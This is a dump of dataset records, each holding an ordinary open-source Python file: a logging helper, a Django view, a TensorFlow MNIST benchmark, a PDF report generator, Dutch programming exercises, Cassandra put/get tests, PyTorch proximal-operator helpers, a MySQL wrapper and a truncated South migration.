args exist, it does the same\n there. If exc_info exists, it uses self.formatter.formatException to\n convert it to string and then stores it in the exc_text attribute and wipes\n exc_info.\n \"\"\" # noqa\n\n formatter = logging.Formatter()\n\n def prepare(self, record):\n \"\"\"Prepare the log record for pickling.\n\n If record.msg is a mapping, call str on all its items. If record.args\n is a sequence or mapping, call str on all its items. Convert\n record.exc_info to a string at record.exc_text, using\n self.formatter.formatException, and wipe out record.exc_info.\n\n :param record: the log record to prepare\n :type record: logging.LogRecord\n :returns: the prepared log record\n :rtype: logging.LogRecord\n \"\"\"\n\n record.msg = stringify(record.msg)\n record.args = stringify(record.args)\n\n if record.exc_info:\n record.exc_text = self.formatter.formatException(record.exc_info)\n record.exc_info = None\n\n return record\n\n\ndef stringify(obj):\n \"\"\"Recursively str() an object, leaving mappings and sequences.\"\"\"\n if isinstance(obj, str):\n new_obj = obj\n elif isinstance(obj, unicode):\n new_obj = str(obj)\n elif isinstance(obj, collections.Mapping):\n new_obj = {str(k): stringify(v) for k, v in obj.items()}\n elif isinstance(obj, collections.Sequence):\n new_obj = [stringify(i) for i in obj]\n else:\n new_obj = str(obj)\n return new_obj\n","sub_path":"pedsnetdcc/dict_logging.py","file_name":"dict_logging.py","file_ext":"py","file_size_in_byte":8579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"182525057","text":"from django.template.response import TemplateResponse\nfrom django.views.generic import TemplateView\n\n\nclass HomePageView(TemplateView):\n template_name = \"home.html\"\n\n def get(self, request, *args, **kwargs):\n context = {}\n return TemplateResponse(request, self.template_name, context=context)\n","sub_path":"travelsite/articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"222523547","text":"#!/usr/bin/env python\n\n\"\"\"\nTensorFlow MLP Mnist\n\nReference:\n https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/tutorials/mnist/mnist_softmax.py\n See extensive documentation at http://tensorflow.org/tutorials/mnist/beginners/index.md\n\nA very simple MNIST classifer.\n\"\"\"\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport time\nfrom six.moves import urllib, xrange\nimport sys\nfrom os import path\nsys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )\nimport Utils.benchmark_util as util\n\nNUM_CLASSES = 10\nIMAGE_SIZE = 28\nIMAGE_PIXELS = IMAGE_SIZE * IMAGE_SIZE * 1\nONE_HOT = True\n\nTOWER_NAME = 'mlp_tower'\n\nFLAGS = tf.app.flags.FLAGS\n# max_iteration = (epochs * numExamples)/batchSize (15 * 60000)/128\ntf.app.flags.DEFINE_integer('max_iter', 9000, 'Number of iterations to run trainer.')\ntf.app.flags.DEFINE_integer('test_iter', 100, 'Number of iterations to run test.')\ntf.app.flags.DEFINE_integer('hidden1_units', 1000, 'Number of units in hidden layer 1.')\ntf.app.flags.DEFINE_integer('batch_size', 100, 'Batch size. Must divide evenly into the dataset sizes.')\ntf.app.flags.DEFINE_string('train_dir', 'data', 'Directory to put the training data.')\ntf.app.flags.DEFINE_float('learning_rate', 6e-4, 'Initial learning rate.')\ntf.app.flags.DEFINE_float('momentum', 0.9, 'Momentum.')\ntf.app.flags.DEFINE_float('l2', 1e-4, 'Weight decay.')\ntf.app.flags.DEFINE_integer('seed', 42, 'Random seed.')\n\n\ndef _inference(images):\n \"\"\"Build the MNIST model up to where it may be used for inference.\n \"\"\"\n util.LOGGER.debug(\"Build Model\")\n with tf.variable_scope('hidden1'):\n weights = util.init_weights([IMAGE_PIXELS, FLAGS.hidden1_units], FLAGS.seed, FLAGS.l2)\n biases = tf.Variable(tf.zeros([FLAGS.hidden1_units], dtype=util.DTYPE), dtype=util.DTYPE, name='biases')\n hidden1 = tf.nn.relu(tf.matmul(images, weights) + biases)\n with tf.variable_scope('softmax_linear'):\n weights = util.init_weights([FLAGS.hidden1_units, NUM_CLASSES], FLAGS.seed, FLAGS.l2)\n biases = tf.Variable(tf.zeros([NUM_CLASSES], dtype=util.DTYPE), dtype=util.DTYPE, name='biases')\n logits = tf.nn.softmax(tf.matmul(hidden1, weights) + biases)\n return logits\n\n\ndef run(core_type=\"CPU\"):\n total_time = time.time()\n num_gpus = util.NUM_GPUS[core_type]\n\n data_load_time = time.time()\n # Import data\n mnist = util.load_data(input_data, ONE_HOT)\n data_load_time = time.time() - data_load_time\n with tf.Graph().as_default():\n util.LOGGER.debug(\"Load Data\")\n images_placeholder, labels_placeholder = util.placeholder_inputs(ONE_HOT, IMAGE_PIXELS, NUM_CLASSES)\n\n # Build model\n logits = _inference(images_placeholder)\n\n # Define loss and optimizer\n cross_entropy = -tf.reduce_sum(labels_placeholder*tf.log(logits)) # softmax & cross entropy\n train_op = util.setup_optimizer(cross_entropy, FLAGS.learning_rate, FLAGS.momentum)\n\n config = tf.ConfigProto(device_count={'GPU': num_gpus})\n sess = tf.InteractiveSession(config=config)\n sess.run(tf.initialize_all_variables())\n\n train_time = time.time()\n util.LOGGER.debug(\"Train Model\")\n for iter in xrange(FLAGS.max_iter):\n feed_dict = util.fill_feed_dict(mnist.train, images_placeholder, labels_placeholder, FLAGS.batch_size)\n _, loss_value = sess.run([train_op, cross_entropy], feed_dict=feed_dict)\n if iter % 100 == 0: util.LOGGER.debug('Iter %d: loss = %.2f' % (iter, loss_value))\n train_time = time.time() - train_time\n\n # Test trained model\n test_time = time.time()\n util.do_eval(sess, logits, images_placeholder, labels_placeholder, mnist.test, ONE_HOT, FLAGS.test_iter, FLAGS.batch_size)\n test_time = time.time() - test_time\n sess.close\n\n total_time = time.time() - total_time\n print(\"****************Example finished********************\")\n util.printTime('Data load', data_load_time)\n util.printTime('Train', train_time)\n util.printTime('Test', test_time)\n util.printTime('Total', total_time)\n\n\nif __name__ == \"__main__\":\n run(sys.argv[1])\n\n","sub_path":"dl4j-core-benchmark/src/main/java/org/deeplearning4j/MLPMnistSingleLayer/tensorflow_mlp.py","file_name":"tensorflow_mlp.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"577612893","text":"#!/usr/bin/env python3\nfrom reportlab.platypus import SimpleDocTemplate\nfrom reportlab.platypus import Paragraph, Spacer, Table, Image\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom reportlab.lib import colors\n\ndef generate(filename, title, additional_info, table_data):\n styles = getSampleStyleSheet()\n report = SimpleDocTemplate(filename)\n report_title = Paragraph(title, styles[\"h1\"])\n report_info = Paragraph(additional_info, styles[\"BodyText\"])\n table_style = [('GRID', (0,0), (-1,-1), 1, colors.black),\n ('FONTNAME', (0,0), (-1,0), 'Helvetica-Bold'),\n ('ALIGN', (0,0), (-1,-1), 'CENTER')]\n report_table = Table(data=table_data, style=table_style, hAlign=\"LEFT\")\n empty_line = Spacer(1,20)\n report.build([report_title, empty_line, report_info, empty_line, report_table])\n\ndef generate_reports(filename, title, para):\n elements = []\n i=0\n\n # Open the model report\n file=open(para)\n infile = file.read()\n report_paragraphs = infile.split(\"\\n\")\n \n styles = getSampleStyleSheet()\n report = SimpleDocTemplate(filename)\n report_title = Paragraph(title, styles[\"h1\"])\n elements.append(report_title)\n empty_line = Spacer(1, 0)\n elements.append(Spacer(1,2))\n for param in report_paragraphs:\n elements.append(Paragraph(param, styles[\"BodyText\"]))\n i=i+1\n if i%2 ==0 :\n elements.append(empty_line)\n elements.append(empty_line)\n\n print(elements)\n #report_info = Paragraph(para, styles[\"BodyText\"])\n\n report.build(elements)\n","sub_path":"Course6/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"615831932","text":"# Opdracht 5 a\ndef opdracht5a(val):\n index = 0\n while index < len(val):\n print(str(index + 1) + ':' + val[index])\n index += 1\n# opdracht5a('awdawfiawhif')\n\n\n# Opdracht 5 b\ndef addDot(val):\n last = val[len(val) - 1]\n if last == '.':\n return val\n else:\n return val + '.'\n# addDot('adw')\n\ndef opdracht5b(text):\n text = text.split('.')\n result = ''\n for sentence in text:\n if sentence == '':\n break\n sentence = sentence.lstrip(' ')\n result += sentence[0].capitalize() + sentence[1:] + '. '\n return result\n# print(opdracht5b('python is een general-purpose programmeertaal. sql is een declarative programming language.'))\n\n\ndef opdracht5c(text):\n return ' '.join(text.split())\n# opdracht5c('a b')\n\n\ndef opdracht5d(text):\n text = text.replace('0', 'nul')\n text = text.replace('1', 'een')\n text = text.replace('2', 'twee')\n text = text.replace('3', 'drie')\n text = text.replace('4', 'vier')\n text = text.replace('5', 'vijf')\n text = text.replace('6', 'zes')\n text = text.replace('7', 'zeven')\n text = text.replace('8', 'acht')\n text = text.replace('9', 'negen')\n return text\n# opdracht5d('We zitten nu in 2017, volgend jaar is het 2018.')\n\n\ndef opdracht5e(text):\n text = opdracht5b(opdracht5d(addDot(opdracht5c(text))))\n print(text)\n# opdracht5e('we zitten nu in 2017. volgend jaar is het 2018')\n\n# Opdracht 6\n\n# pc 1 =\ndef m1():\n global s\n s = 'no spam...'\n print(s)\n t = 'Java...'\n print(t)\n x = 1\n z = 2\n m2(x, z)\n x = 3\n\ndef m2(x, y):\n x = x + 1\n z = y + 2\n m3(x, z)\n\ndef m3(x, b):\n x = 4\n x = m4(x)\n\ndef m4(z):\n return z + z\n\ns = 'I hate spam'\nt = 'Programming is great'\n# m1()\n# print(s)\n# print(t)\n\n\"\"\"\npc=166\npc=167,s='I hate spam'\npc=168,s='I hate spam',t='Programming is great'\npc=168,s='I hate spam',t='Programming is great'|pc=144, s='I hate spam'\npc=168,s='I hate spam',t='Programming is great'|pc=145, s='no spam...'\npc=168,s='I hate spam',t='Programming is great'|pc=146, s='no spam...'\npc=168,s='I hate spam',t='Programming is great'|pc=147, s='no spam...'\npc=168,s='I hate spam',t='Programming is great'|pc=148, s='no spam...',t='Java...'\npc=168,s='I hate spam',t='Programming is great'|pc=150, s='no spam...',t='Java...',x=1\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=155,x=1,y=2\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=156,x=2,y=2\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=157,x=2,y=4\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=158,x=2,y=4|pc=160,x=2,b=4\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=158,x=2,y=4|pc=161,x=4,b=4\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=158,x=2,y=4|pc=161,x=4,b=4|pc=164,z=4,return=8\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=158,x=2,y=4|pc=161,x=8,b=4\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=157,x=8,y=4\npc=168,s='I hate spam',t='Programming is great'|pc=152, s='no spam...',t='Java...',x=1,y=2\npc=168,s='I hate spam',t='Programming is great'|pc=152, s='no spam...',t='Java...',x=3,y=2\npc=169,s='I hate spam',t='Programming is great'\npc=170,s='I hate spam',t='Programming is great'\n\"\"\"","sub_path":"1.2/5-6.py","file_name":"5-6.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"44101139","text":"from .classifier import *\nfrom .eegData import *\nfrom .music import *\nfrom .client import *\n\nfrom MusEEG import parentDir, resetPort\n\nimport pickle\nimport threading\n\n\"\"\"\nDEPRECATED\nthis is the processor used to run the demo app\n\"\"\"\n\n\nclass cerebro:\n \"\"\"\n hello message to display in UI\n \"\"\"\n demomsg = (\n 'Hello! welcome to the MusEEG demo. This demo will: \\n'\n '- send a pre-recorded brain signal of your choice when you click on any of the gesture buttons\\n'\n '- process it using a 4-level, db2 wavelet transform\\n'\n '- extract the first four statistical moments of the wavelet decompositions (mean, variance, skewness, kurtosis)\\n'\n '- classify it using a deep neural network\\n'\n '- using the results from the DNN, play the chord that is referenced to the gesture using MIDI\\n'\n '- to change a chord, press the \"update chord dictionary\" button after youve changed the notes\\n')\n eeg = eegData()\n\n gestures = ['smile', 'eyebrows', 'lookleft', 'lookright',\n 'neutral', 'scrunch']\n\n def __init__(self):\n #default mididict. it will be updated everytime the user presses the update chord button\n self.mididict = self.loadMIDIdict(os.path.join(parentDir, 'data', 'MIDIdicts', 'cMajorExtended.pickle'))\n\n # open and reset midiport\n resetPort()\n\n # load the ANN classifier (bigbrain for whole eeg chunks, small brain for small chunks)\n self.bigBrain = classifier()\n self.bigBrain.loadmodel(os.path.join(parentDir, 'data', 'savedModels', 'bigBrain_v2'))\n\n self.smallBrain = classifier()\n self.smallBrain.loadmodel(os.path.join(parentDir, 'data', 'savedModels', 'smallBrain_v1'))\n\n # define chords and tempo to be used\n music.tempo = 60 # bpm\n music.midiChannel = 0 # add 1\n\n def setupClient(self):\n self.client = client()\n self.client.setup()\n\n def updateChordList(self, chordlistlist):\n for c in chordlistlist:\n index = chordlistlist.index(c)\n gestureBeingDefined = self.gestures[index]\n self.mididict[gestureBeingDefined] = chord(notelist=chordlistlist[index], name=gestureBeingDefined)\n print(self.mididict)\n\n def saveMIDIdict(self, addressPath):\n with open(os.path.join(addressPath), 'wb') as handle:\n pickle.dump(self.mididict, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n def loadMIDIdict(self, addressPath):\n with open(addressPath, 'rb') as handle:\n self.mididict = pickle.load(handle)\n return self.mididict\n\n def loadFromDataSet(self, name):\n # subdirectory where sample chunks are located and load a random chunk from trianing dataset\n SUBDIR = os.path.join('trainbatch1', 'bigChunks')\n self.eeg.loadChunkFromTraining(subdir=SUBDIR, filename=name + '_' + str(np.random.randint(0, 60)) + '.csv')\n\n def processAndPlay(self, arp, tempo, arpDurationFromGUI, noteDurationFromGUI):\n print('performing wavelet transform')\n brainInput = self.eeg.process()\n\n self.arpDurationFromGUI = arpDurationFromGUI\n self.noteDurationFromGUI = noteDurationFromGUI\n\n # classify facial gesture in DNN\n brainOutput = self.bigBrain.classify(brainInput.reshape(1, 350))\n print('the neural network has taken the brain signal and classified it.')\n self.gestureResult = self.gestures[brainOutput]\n print('classification result: ' + self.gestureResult)\n\n # refer classification to midi dictionary and refer chord object to musician\n musician = self.mididict[self.gestureResult]\n musician.set_tempo(tempo=tempo)\n\n #with threading\n musicianProcess = threading.Thread(target=self.perform, args=[musician, arp])\n musicianProcess.start()\n\n def perform(self, musician, arp):\n if arp:\n print('arpeggiate!')\n musician.arpeggiate(notelength=self.arpDurationFromGUI, vel=30, numTimes=8)\n\n else:\n musician.panic()\n musician.playchord(qtrnotes=self.noteDurationFromGUI, vel=30)\n","sub_path":"MusEEG/cerebro.py","file_name":"cerebro.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"75610630","text":"from dtest import Tester\nimport tools\nfrom tools import no_vnodes, create_c1c2_table, ThriftConnection\n\nimport time\n\nclass TestPutGet(Tester):\n\n def putget_test(self):\n \"\"\" Simple put/get on a single row, hitting multiple sstables \"\"\"\n self._putget()\n\n def putget_snappy_test(self):\n \"\"\" Simple put/get on a single row, but hitting multiple sstables (with snappy compression) \"\"\"\n self._putget(compression=\"Snappy\")\n\n def putget_deflate_test(self):\n \"\"\" Simple put/get on a single row, but hitting multiple sstables (with deflate compression) \"\"\"\n self._putget(compression=\"Deflate\")\n\n # Simple queries, but with flushes in between inserts to make sure we hit\n # sstables (and more than one) on reads\n def _putget(self, compression=None):\n cluster = self.cluster\n\n cluster.populate(3).start()\n [node1, node2, node3] = cluster.nodelist()\n\n cursor = self.patient_cql_connection(node1).cursor()\n self.create_ks(cursor, 'ks', 3)\n self.create_cf(cursor, 'cf', compression=compression)\n\n tools.putget(cluster, cursor)\n\n def non_local_read_test(self):\n \"\"\" This test reads from a coordinator we know has no copy of the data \"\"\"\n cluster = self.cluster\n\n cluster.populate(3).start()\n [node1, node2, node3] = cluster.nodelist()\n\n cursor = self.patient_cql_connection(node1).cursor()\n self.create_ks(cursor, 'ks', 2)\n create_c1c2_table(self, cursor)\n\n # insert and get at CL.QUORUM (since RF=2, node1 won't have all key locally)\n for n in xrange(0, 1000):\n tools.insert_c1c2(cursor, n, \"QUORUM\")\n tools.query_c1c2(cursor, n, \"QUORUM\")\n\n def rangeputget_test(self):\n \"\"\" Simple put/get on ranges of rows, hitting multiple sstables \"\"\"\n\n cluster = self.cluster\n\n cluster.populate(3).start()\n [node1, node2, node3] = cluster.nodelist()\n\n cursor = self.patient_cql_connection(node1).cursor()\n self.create_ks(cursor, 'ks', 2)\n self.create_cf(cursor, 'cf')\n\n tools.range_putget(cluster, cursor)\n\n def wide_row_test(self):\n \"\"\" Test wide row slices \"\"\"\n cluster = self.cluster\n\n cluster.populate(3).start()\n [node1, node2, node3] = cluster.nodelist()\n\n cursor = self.patient_cql_connection(node1).cursor()\n self.create_ks(cursor, 'ks', 1)\n self.create_cf(cursor, 'cf')\n\n key = 'wide'\n\n for x in xrange(1, 5001):\n tools.insert_columns(self, cursor, key, 100, offset=x-1)\n\n for size in (10, 100, 1000):\n for x in xrange(1, (50001 - size) / size):\n tools.query_columns(self, cursor, key, size, offset=x*size-1)\n\n @no_vnodes()\n def wide_slice_test(self):\n \"\"\" \n Check slicing a wide row. \n See https://issues.apache.org/jira/browse/CASSANDRA-4919 \n\n From Sylvain about duplicating:\n\n Ok, so now that I think about it, you can't reproduce that with CQL currently.\n You'll have to use the thrift get_paged_slice call as it's the only way to\n trigger this.\n\n Then, I think you'll be able to reproduce with the following steps:\n 1) you'd want to use 2 nodes with RF=1 and with ByteOrderedPartitioner (it's\n possible to reproduce with a random partitioner but a tad more painful)\n 2) picks token for the nodes so that you know what goes on which node. For\n example you may want that any row key starting with 'a' goes on node1, and\n anything starting with a 'b' goes on node 2.\n 3) insers data that span the two nodes. Say inserts 20 rows 'a0' ... 'a9' and\n 'b0' ...'b9' (so 10 rows on each node) with say 10 columns on row.\n 4) then do a get_paged_slice for keys 'a5' to 'b4' and for the column filter, a\n slice filter that picks the fifth last columns.\n 5) the get_paged_slice is supposed to return 95 columns (it should return the 5\n last columns of a5 and then all 10 columns for 'a6' to 'b4'), but without\n CASSANDRA-4919 it will return 90 columns only (it will only return the 5 last\n columns of 'b0').\n \"\"\"\n cluster = self.cluster\n cluster.set_configuration_options(values={'partitioner': 'org.apache.cassandra.dht.ByteOrderedPartitioner'})\n cluster.populate(2)\n [node1, node2] = cluster.nodelist()\n node1.set_configuration_options(values={'initial_token': \"a\".encode('hex') })\n node1.set_configuration_options(values={'initial_token': \"b\".encode('hex') })\n cluster.start()\n time.sleep(.5)\n cursor = self.patient_cql_connection(node1, version=\"2.0.0\").cursor()\n self.create_ks(cursor, 'ks', 1)\n\n query = \"\"\"\n CREATE TABLE test (\n k text PRIMARY KEY\n );\n \"\"\"\n cursor.execute(query)\n time.sleep(.5)\n\n for i in xrange(10):\n key_num = str(i).zfill(2)\n query1 = \"INSERT INTO test (k, 'col0', 'col1', 'col2', 'col3', 'col4', 'col5', 'col6', 'col7', 'col8', 'col9') VALUES ('a%s', 0, 1, 2, 3, 4, 5, 6, 7, 8, 9)\" % (key_num)\n query2 = \"INSERT INTO test (k, 'col0', 'col1', 'col2', 'col3', 'col4', 'col5', 'col6', 'col7', 'col8', 'col9') VALUES ('b%s', 0, 1, 2, 3, 4, 5, 6, 7, 8, 9)\" % (key_num)\n cursor.execute(query1)\n cursor.execute(query2)\n\n cursor.close()\n\n tc = ThriftConnection(node1, ks_name='ks', cf_name='test')\n tc.use_ks()\n\n # Slice on the keys\n rnge = tc.Cassandra.KeyRange(\n start_key=\"a%s\" % ('5'.zfill(2)),\n end_key=\"b%s\" % ('4'.zfill(2)),\n count=9999,\n )\n rows = tc.client.get_paged_slice(\n column_family='test',\n range=rnge,\n start_column='col5',\n consistency_level=tc.Cassandra.ConsistencyLevel.ONE,\n )\n keys = [fd.key for fd in rows]\n columns = []\n for row in rows:\n cols = [col.column.name for col in row.columns]\n columns.extend(cols)\n #print row.key\n #print cols\n \n assert len(columns) == 95, \"Regression in cassandra-4919. Expected 95 columns, got %d.\" % len(columns)\n","sub_path":"putget_test.py","file_name":"putget_test.py","file_ext":"py","file_size_in_byte":6301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"37161234","text":"import torch\nimport matplotlib.pyplot as plt\nimport pickle\nimport time\nimport argparse \nimport numpy as np\nimport sympy as sym\nimport math\nfrom numpy import linalg as LA\nimport logging\nfrom scipy.interpolate import interp1d\n\ntorch.manual_seed(1993)\n\ndef solve_ga_bisection(a, p, epsilon=1.e-8):\n \"\"\"Return the solution of (x/a)^(p-1)+x=1, via bi-section method.\"\"\"\n if a>0.:\n U = 1\n L = 0.\n error = epsilon + 1\n f = lambda x:(x/a)**(p-1)+x-1\n while error>epsilon:\n C = (L+U)/2. \n if f(C)*f(U) <= 0:\n L = C\n else:\n U = C\n \n error = (U-L)\n \n \n return C\n else:\n return 0.\n\ndef pNormProxOp(V, rho, p=2, eps=1.e-6, g_est=None):\n \"\"\"\n Return the p-norm prox operator for the vector V\n argmin_X ||X||_p + rho/2 \\|X - V\\|_2^2\n \"\"\"\n def g_func(a, p, bisect=True):\n \"Return the solution of (x/a)^(p-1) + x = 1\"\n if a>0:\n x = sym.Symbol(\"x\", positive=True)\n sols = sym.solvers.solve((x/a)**(p-1)+x-1, x)\n if len(sols) == 0:\n sol = 0.\n else:\n sol = max(sols)\n return sol\n else:\n return 0.\n\n t_start = time.time()\n b_size, data_size = V.size()\n\n\n if b_size != 1:\n raise Exception('V must has a batch dimenstion of one.')\n V = V.squeeze(0)\n\n if p == 2:\n return EuclidianProxOp(V, 1./rho)\n\n elif p == 1:\n return ell1normProxOp(V, rho)\n elif p == -2:\n return norm2squaredProxOp(V, rho)\n signs = torch.sign(V)\n V_normalized = rho * torch.abs(V)\n vec_size = V_normalized.size()[0]\n q = p/(p-1.)\n if torch.norm(V_normalized, p=q) < 1:\n U = torch.zeros( vec_size )\n U = U.unsqueeze(0)\n return U \n upper_bound = torch.norm(V_normalized, p=p)\n lower_bound = 0.0\n U = torch.zeros(vec_size, dtype=torch.float, device=V.device)\n\n\n #estimator for g function\n if g_est is None:\n g_est = estimate_gFunction(p)\n\n for k in range( math.ceil(math.log2(1./eps)) ):\n\n mid_bound = 0.5 * (upper_bound + lower_bound )\n for j in range(vec_size):\n try:\n if V.get_device() >= 0:\n\n #NOTE: Tensors moved back and forth between cpu and gpu to pass through the estimated g function\n g_est_input_on_cpu = ( mid_bound * V_normalized[j] ** ((2.0-p) / (p-1.0)) ).to( torch.device(\"cpu\") ) \n\n g_est_output_on_cpu = g_est( g_est_input_on_cpu )\n\n g_est_output_on_gpu = torch.tensor(g_est_output_on_cpu, dtype = torch.float32, device = V.device)\n\n\n U_j = V_normalized[j] * g_est_output_on_gpu\n\n else:\n\n U_j = V_normalized[j] * g_est(mid_bound * V_normalized[j] ** ((2.0-p) / (p-1.0)) )\n\n except ValueError:\n #if argument of g_est is above the given values (during estimating ga) the output is 1\n U_j = V_normalized[j] \n U[j] = U_j\n\n #compute norm\n U_norm = torch.norm(U, p=p)\n\n #update bounds\n if U_norm < mid_bound:\n upper_bound = mid_bound\n else:\n lower_bound = mid_bound\n\n\n #logging.debug('Computed the proximal operator in {0:0.2f}(s)'.format(time.time() - t_start) )\n U = U.unsqueeze(0)\n return U * signs / rho\n\ndef norm2squaredProxOp(V, rho):\n \"\"\"\n Return the 2-norm prox operator for the vector V\n argmin_X ||X||_2^2 + rho/2 \\|X - V\\|_2^2\n \"\"\"\n return rho / (rho + 2) * V\n\ndef EuclidianProxOp(V, rho):\n \"\"\"\n Return the 2-norm prox operator for the vector V\n argmin_X rho ||X||_2 + 1/2 \\|X - V\\|_2^2\n \"\"\"\n V_norm = torch.norm(V, 2)\n if V_norm < rho:\n return torch.zeros( V.size() ).unsqueeze(0)\n return (1 - rho / V_norm ) * V.unsqueeze(0)\n\ndef ell1normProxOp(V, rho):\n \"\"\"\n Return the 2-norm prox operator for the vector V\n argmin_X ||X||_1 + rho/2 \\|X - V\\|_2^2\n \"\"\"\n V_proj = torch.max(V - 1./rho, V * 0.0) - torch.max(-1. * V - 1./rho, V * 0.0)\n return V_proj.unsqueeze(0)\n\ndef estimate_gFunction(p, eps=1.e-8, kind='linear'):\n \"\"\"\n Return an estimator for the g function that is the solution of (x/a)^(p-1)+x=1.\n \"\"\"\n\n g_inv = lambda x: (1. - x ) ** (1./ (1. - p)) * x\n\n #Generate a set of x and a pairs\n x = torch.arange(0, 1, eps)\n\n\n a = g_inv( x )\n\n return interp1d(a, x, kind=kind)\n\n\n\n \n \n \n \ndef _testOpt(U, V, rho, p):\n V = V.squeeze(0)\n U = U.squeeze(0)\n vec_size = V.size()[0]\n norm_U = torch.norm(U, p=p)\n return [(U[i] / norm_U) ** (p-1.0) + rho * (U[i] - V[i]) for i in range(vec_size)]\n \ndef clearFile(file):\n \"Delete all contents of a file\"\n with open(file,'w') as f:\n f.write(\"\")\n\ndef dumpFile(fname, obj):\n \"\"\"\n Dump picklable object obj to the file fname.\"\n \"\"\"\n with open(fname,'wb') as f:\n pickle.dump(obj, f)\n\ndef loadFile(fname):\n \"\"\"\n Load the object dumped in fname.\n \"\"\"\n with open(fname, 'rb') as current_file:\n obj = pickle.load(current_file)\n return obj\n \n \nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--n\", type=int, help=\"vector size\", default=10)\n parser.add_argument(\"--p\", type=float, help=\"p norm\", default=2.)\n parser.add_argument(\"--rho\", type=float, help=\"rho\", default=1.0)\n args = parser.parse_args()\n \n# for p in [1.5, 2.5,4,5]:\n# estimate_g = estimate_gFunction(p)\n# dumpFile('interpolations/p' + str(p), estimate_g)\n# print('Estimation and saving done for {}'.format(p))\n\n if args.p not in [1, 2]:\n g_est = estimate_gFunction( args.p )\n\n t_s = time.time()\n# logging.getLogger().setLevel(logging.INFO) \n V = torch.randn(1, args.n)\n V = torch.abs(V)\n\n \n U_p = pNormProxOp(V, rho=args.rho, p=args.p, g_est = g_est)\n #U = EuclidianProxOp(V, args.rho)\n# print (U_p.size())\n t_e = time.time()\n print(\"Time taken is \", t_e - t_s)\n","sub_path":"code/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"55432591","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ----\n# Yprisoner \n# 2019/8/17 上午10:15\n# ------\nfrom pymysql import (\n Connect,\n Connection,\n cursors\n)\n\nmysql_config: dict = dict(\n host='192.168.1.17',\n user='root',\n password='root',\n database='mex_ancient',\n port=3306,\n charset='utf8'\n)\n\n\nclass Database(object):\n __mysql_conf = dict()\n __conn = None\n __cursor = None\n\n def __init__(self, conf: dict):\n self.__mysql_conf = dict(dict(cursorclass=cursors.DictCursor), **conf)\n if self.__conn is None:\n self.__conn = self.connection\n self.__cursor = self.__conn.cursor()\n\n @property\n def connection(self) -> Connection:\n return Connect(**self.__mysql_conf)\n\n def get(self, sql: str, data: list = None) -> dict:\n self.__cursor.execute(sql, data)\n return self.__cursor.fetchone()\n\n def fetch(self, sql: str, data: list = None) -> list:\n self.__cursor.execute(sql, data)\n return self.__cursor.fetchall()\n\n def exec(self, sql: str, data: list) -> int:\n if len(data) > 0:\n result = self.__cursor.execute(sql, data)\n else:\n result = self.__cursor.execute(sql)\n self.__conn.commit()\n return result\n\n def __del__(self):\n self.__cursor.close()\n self.__conn.close()\n\n\ndef getQuery() -> Database:\n return Database(mysql_config)\n","sub_path":"lib/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"403318827","text":"# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n # Adding model 'ElectricPanel'\n db.create_table(u'public_lights_electricpanel', (\n ('identifier', self.gf('django.db.models.fields.CharField')(unique=True, max_length=10, primary_key=True)),\n ('number', self.gf('django.db.models.fields.CharField')(max_length=20, null=True)),\n ('geom', self.gf('django.contrib.gis.db.models.fields.PointField')(null=True)),\n ))\n db.send_create_signal(u'public_lights', ['ElectricPanel'])\n\n # Adding model 'ElectricPanelEvent'\n db.create_table(u'public_lights_electricpanelevent', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('device', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['public_lights.ElectricPanel'])),\n ('time', self.gf('django.db.models.fields.DateTimeField')()),\n ('status', self.gf('django.db.models.fields.CharField')(max_length=15)),\n ('extra', self.gf('django.db.models.fields.CharField')(max_length=200, null=True)),\n ))\n db.send_create_signal(u'public_lights', ['ElectricPanelEvent'])\n\n # Adding model 'PhaseLine'\n db.create_table(u'public_lights_phaseline', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n 